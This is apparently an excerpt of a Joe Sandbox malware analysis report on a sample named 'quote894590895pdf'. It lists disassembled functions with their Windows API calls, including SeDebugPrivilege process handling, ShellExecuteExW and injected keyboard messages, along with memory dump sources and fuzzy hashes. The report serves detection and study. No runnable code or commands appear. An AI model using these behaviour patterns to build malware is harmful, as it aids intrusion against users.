                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                    • String ID: SeDebugPrivilege
                                                                    • API String ID: 2533919879-2896544425
                                                                    • Opcode ID: 36145e12fce93bbee12400546b06ebbb30c9b9567402d772500dfa57af0f31ee
                                                                    • Instruction ID: fea32f41891776fab71280d666960c49c4867f6c7d9d41227ed4a22f91f5b5da
                                                                    • Opcode Fuzzy Hash: 36145e12fce93bbee12400546b06ebbb30c9b9567402d772500dfa57af0f31ee
                                                                    • Instruction Fuzzy Hash: 52415A312002019FDB25EF54C8A9FAEB7E5EF84314F08945AF846AF392CB75A805CB95
                                                                    APIs
                                                                    • LoadIconW.USER32(00000000,00007F03), ref: 00EC30CD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: IconLoad
                                                                    • String ID: blank$info$question$stop$warning
                                                                    • API String ID: 2457776203-404129466
                                                                    • Opcode ID: 7c80f5703e110bf3edb08ac1f33a87a3ab0edcfdda5ddc5aa2b78563214ca750
                                                                    • Instruction ID: ad3cef8743cab0c5505f9051a1cc519a4cf660263055da01b9f3e9903ae2a5bf
                                                                    • Opcode Fuzzy Hash: 7c80f5703e110bf3edb08ac1f33a87a3ab0edcfdda5ddc5aa2b78563214ca750
                                                                    • Instruction Fuzzy Hash: 6E113B3760834ABAD7206A35DD83EEB279CDF05764F20902EF50476181DEB39F4346A1
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00EC4353
                                                                    • LoadStringW.USER32(00000000), ref: 00EC435A
                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00EC4370
                                                                    • LoadStringW.USER32(00000000), ref: 00EC4377
                                                                    • _wprintf.LIBCMT ref: 00EC439D
                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00EC43BB
                                                                    Strings
                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 00EC4398
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: HandleLoadModuleString$Message_wprintf
                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                    • API String ID: 3648134473-3128320259
                                                                    • Opcode ID: 4a486a5f3905602d32f3a7bef4897c40440f2ec4d0a7760a7f01d9425db12c33
                                                                    • Instruction ID: d468403fda005010dfaa97078eb99bf04b62460f552ddec5188771a431c7685f
                                                                    • Opcode Fuzzy Hash: 4a486a5f3905602d32f3a7bef4897c40440f2ec4d0a7760a7f01d9425db12c33
                                                                    • Instruction Fuzzy Hash: A20162F290024CBFE721ABA5DDC9EE6776CD708301F0005A5FB49F6051EA759E894BB1
                                                                    APIs
                                                                      • Part of subcall function 00E62612: GetWindowLongW.USER32(?,000000EB), ref: 00E62623
                                                                    • GetSystemMetrics.USER32(0000000F), ref: 00EED4E6
                                                                    • GetSystemMetrics.USER32(0000000F), ref: 00EED506
                                                                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00EED741
                                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00EED75F
                                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00EED780
                                                                    • ShowWindow.USER32(00000003,00000000), ref: 00EED79F
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00EED7C4
                                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 00EED7E7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                    • String ID:
                                                                    • API String ID: 1211466189-0
                                                                    • Opcode ID: 4bc6c3d47fe799ec9eb83bdedf33d18ce24331281e09e6a543f9e1b318c8c570
                                                                    • Instruction ID: d10e9109a8549b333a4b067cf58ff5c6da998b7cdcfddd28228cdd5af448a8e5
                                                                    • Opcode Fuzzy Hash: 4bc6c3d47fe799ec9eb83bdedf33d18ce24331281e09e6a543f9e1b318c8c570
                                                                    • Instruction Fuzzy Hash: 2AB1993160426AEFDF14CF2AC9C57AE7BB1FF04715F08906AEC48AE295D734A950CB90
                                                                    APIs
                                                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00E9C347,00000004,00000000,00000000,00000000), ref: 00E62ACF
                                                                    • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00E9C347,00000004,00000000,00000000,00000000,000000FF), ref: 00E62B17
                                                                    • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00E9C347,00000004,00000000,00000000,00000000), ref: 00E9C39A
                                                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00E9C347,00000004,00000000,00000000,00000000), ref: 00E9C406
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ShowWindow
                                                                    • String ID:
                                                                    • API String ID: 1268545403-0
                                                                    • Opcode ID: 91176105b655e5691402cffbeb66d6cf374a57a66b9870f0dd5c4f18437a8a61
                                                                    • Instruction ID: b783ef204d6b24f97720427040a3858f9b769b964c01bb7ffdd48c59374428c7
                                                                    • Opcode Fuzzy Hash: 91176105b655e5691402cffbeb66d6cf374a57a66b9870f0dd5c4f18437a8a61
                                                                    • Instruction Fuzzy Hash: 1A414930254F809FCB359B69ACCC7BA3B91AB45344F24E91DF297B6560C6B09845E710
                                                                    APIs
                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 00EC7186
                                                                      • Part of subcall function 00E80F36: std::exception::exception.LIBCMT ref: 00E80F6C
                                                                      • Part of subcall function 00E80F36: __CxxThrowException@8.LIBCMT ref: 00E80F81
                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00EC71BD
                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00EC71D9
                                                                    • _memmove.LIBCMT ref: 00EC7227
                                                                    • _memmove.LIBCMT ref: 00EC7244
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00EC7253
                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00EC7268
                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00EC7287
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                    • String ID:
                                                                    • API String ID: 256516436-0
                                                                    • Opcode ID: 25b9fec8fd1cb18be7d0c4aa58d1a6ccaa234c829fa7ad82d219c58f13d9ea6c
                                                                    • Instruction ID: ca2a45f83553728de1e5367132a2921b0588159f33562d888b31aaef88353108
                                                                    • Opcode Fuzzy Hash: 25b9fec8fd1cb18be7d0c4aa58d1a6ccaa234c829fa7ad82d219c58f13d9ea6c
                                                                    • Instruction Fuzzy Hash: 5431A371A00209EFCF50EF55DD85EAAB7B8EF44310F1581A9F908BB256D7309E15CBA0
                                                                    APIs
                                                                    • DeleteObject.GDI32(00000000), ref: 00EE621D
                                                                    • GetDC.USER32(00000000), ref: 00EE6225
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EE6230
                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00EE623C
                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00EE6278
                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00EE6289
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00EE905C,?,?,000000FF,00000000,?,000000FF,?), ref: 00EE62C3
                                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00EE62E3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                    • String ID:
                                                                    • API String ID: 3864802216-0
                                                                    • Opcode ID: 6e6d1e58d1d0e84c543aa1083bcbe2f2e614960601efcb0c94c73fedf0c9c49c
                                                                    • Instruction ID: c08ce8735ae116a99ff640d34156c4623fafb1b97537bb09cb9431f42a712f9d
                                                                    • Opcode Fuzzy Hash: 6e6d1e58d1d0e84c543aa1083bcbe2f2e614960601efcb0c94c73fedf0c9c49c
                                                                    • Instruction Fuzzy Hash: E8319172101158BFEB118F51DC89FEB3BA9EF09755F044065FE08AE2A1C6759C45CBA4
                                                                    APIs
                                                                      • Part of subcall function 00E69997: __itow.LIBCMT ref: 00E699C2
                                                                      • Part of subcall function 00E69997: __swprintf.LIBCMT ref: 00E69A0C
                                                                      • Part of subcall function 00E7FE06: _wcscpy.LIBCMT ref: 00E7FE29
                                                                    • _wcstok.LIBCMT ref: 00ECED20
                                                                    • _wcscpy.LIBCMT ref: 00ECEDAF
                                                                    • _memset.LIBCMT ref: 00ECEDE2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                    • String ID: X
                                                                    • API String ID: 774024439-3081909835
                                                                    • Opcode ID: bd335382e2097d64e28d1c6911ccf6f15b8bcafce5bdad4eb518460bfb3e666b
                                                                    • Instruction ID: b9e0185f9187406ca7561727e22286f304afd28f76bb99ff50b6c895fb1ca980
                                                                    • Opcode Fuzzy Hash: bd335382e2097d64e28d1c6911ccf6f15b8bcafce5bdad4eb518460bfb3e666b
                                                                    • Instruction Fuzzy Hash: DCC14F316483409FC724EF24D991E9AB7E4BF84354F04592DF899AB3A2DB31ED45CB82
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ba068826530ca0e9839f7b192a392c805c86324958ccdd80c156fb770ab190fb
                                                                    • Instruction ID: dbb7955e4069f52c415222f5c7c0cd79cb96e6f51cce512fd446f00ce814b59d
                                                                    • Opcode Fuzzy Hash: ba068826530ca0e9839f7b192a392c805c86324958ccdd80c156fb770ab190fb
                                                                    • Instruction Fuzzy Hash: 96717B30940119EFCB15CF98DC88ABEBBB9FF85354F188199F915BB251C730AA51CBA0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a577250d01b5252476a39af04ba80e5a9892ff1517deec7cac7b51ba5b976931
                                                                    • Instruction ID: 4816caa5ef45524fe1780677263bb294e44ebcc3fd5a1998cfcf5d5234dcc006
                                                                    • Opcode Fuzzy Hash: a577250d01b5252476a39af04ba80e5a9892ff1517deec7cac7b51ba5b976931
                                                                    • Instruction Fuzzy Hash: 6861CE32244300ABD710EB24DC82E6FB7E9EF84754F04691AF955AB292DB30EE05C792
                                                                    APIs
                                                                    • IsWindow.USER32(017C64C8), ref: 00EEB41F
                                                                    • IsWindowEnabled.USER32(017C64C8), ref: 00EEB42B
                                                                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00EEB50F
                                                                    • SendMessageW.USER32(017C64C8,000000B0,?,?), ref: 00EEB546
                                                                    • IsDlgButtonChecked.USER32(?,?), ref: 00EEB583
                                                                    • GetWindowLongW.USER32(017C64C8,000000EC), ref: 00EEB5A5
                                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00EEB5BD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                    • String ID:
                                                                    • API String ID: 4072528602-0
                                                                    • Opcode ID: 2604a52ee240763040d5d60995ec37e0d932444e4cdede68052bfde336018ebc
                                                                    • Instruction ID: 89fdf2a3205000eb0c4103c014edd5dc13d01cfb41a970a1238638ab2cac9ca0
                                                                    • Opcode Fuzzy Hash: 2604a52ee240763040d5d60995ec37e0d932444e4cdede68052bfde336018ebc
                                                                    • Instruction Fuzzy Hash: 2C71ED3460028CAFDB209FA6C894FEB7BA5FF09304F005069F961BB2A2D731A940CB10
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00EDF55C
                                                                    • _memset.LIBCMT ref: 00EDF625
                                                                    • ShellExecuteExW.SHELL32(?), ref: 00EDF66A
                                                                      • Part of subcall function 00E69997: __itow.LIBCMT ref: 00E699C2
                                                                      • Part of subcall function 00E69997: __swprintf.LIBCMT ref: 00E69A0C
                                                                      • Part of subcall function 00E7FE06: _wcscpy.LIBCMT ref: 00E7FE29
                                                                    • GetProcessId.KERNEL32(00000000), ref: 00EDF6E1
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00EDF710
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                    • String ID: @
                                                                    • API String ID: 3522835683-2766056989
                                                                    • Opcode ID: ddde1980eac29054d72062c406ce708f90f0c747c8176fbf2af24efb80602904
                                                                    • Instruction ID: 18356505413c5091918e10d760763bea0e6c782271943b1a8300772d88e0acb0
                                                                    • Opcode Fuzzy Hash: ddde1980eac29054d72062c406ce708f90f0c747c8176fbf2af24efb80602904
                                                                    • Instruction Fuzzy Hash: 6C61AF75A00619DFCB14EF94D4819AEBBF5FF48314F14946AE85ABB361CB30AD41CB90
                                                                    APIs
                                                                    • GetParent.USER32(?), ref: 00EC12BD
                                                                    • GetKeyboardState.USER32(?), ref: 00EC12D2
                                                                    • SetKeyboardState.USER32(?), ref: 00EC1333
                                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00EC1361
                                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 00EC1380
                                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00EC13C6
                                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00EC13E9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                    • String ID:
                                                                    • API String ID: 87235514-0
                                                                    • Opcode ID: ddd4c4cfac841b129191f87754d4832256cf174a5f6376de4ff0bdbc554ba9d7
                                                                    • Instruction ID: 759fe39d9aa809229a3179056b1706583ef08e41c90058974e154124999475e3
                                                                    • Opcode Fuzzy Hash: ddd4c4cfac841b129191f87754d4832256cf174a5f6376de4ff0bdbc554ba9d7
                                                                    • Instruction Fuzzy Hash: 4851E4A09047D53EFB3642388D45FBA7EE96F07308F0895CDE0D5698C3C29A9C9AD760
                                                                    APIs
                                                                    • GetParent.USER32(00000000), ref: 00EC10D6
                                                                    • GetKeyboardState.USER32(?), ref: 00EC10EB
                                                                    • SetKeyboardState.USER32(?), ref: 00EC114C
                                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00EC1178
                                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00EC1195
                                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00EC11D9
                                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00EC11FA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                    • String ID:
                                                                    • API String ID: 87235514-0
                                                                    • Opcode ID: 755c5135738565558a854e8b1266243cacc7162e41ebd8489657d8e224954e9f
                                                                    • Instruction ID: 80b291822e1909f8cc8f90d030cf323ee4c06549399f620c1e487bf49f89f54e
                                                                    • Opcode Fuzzy Hash: 755c5135738565558a854e8b1266243cacc7162e41ebd8489657d8e224954e9f
                                                                    • Instruction Fuzzy Hash: 8C5124A05057D63DFB3683248D41FBA7EA96B07304F0C95CDE1D56A8C3C29AEC9AE750
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsncpy$LocalTime
                                                                    • String ID:
                                                                    • API String ID: 2945705084-0
                                                                    • Opcode ID: 71cb817bba4000339348156e89b1e27fa6b2501a83fa6cb0d1bb45dbdec69abf
                                                                    • Instruction ID: 6c1e0dbdcf53c9d43117873cf48b76d99a32c7342faae5d6936c4c2ef562acb6
                                                                    • Opcode Fuzzy Hash: 71cb817bba4000339348156e89b1e27fa6b2501a83fa6cb0d1bb45dbdec69abf
                                                                    • Instruction Fuzzy Hash: 1E41B0A6C2061479CB11FBB49886ACFB7B8DF05310F10A46AF90CF3161E639E746C3A5
                                                                    APIs
                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00EBD8E3
                                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00EBD919
                                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00EBD92A
                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00EBD9AC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$AddressCreateInstanceProc
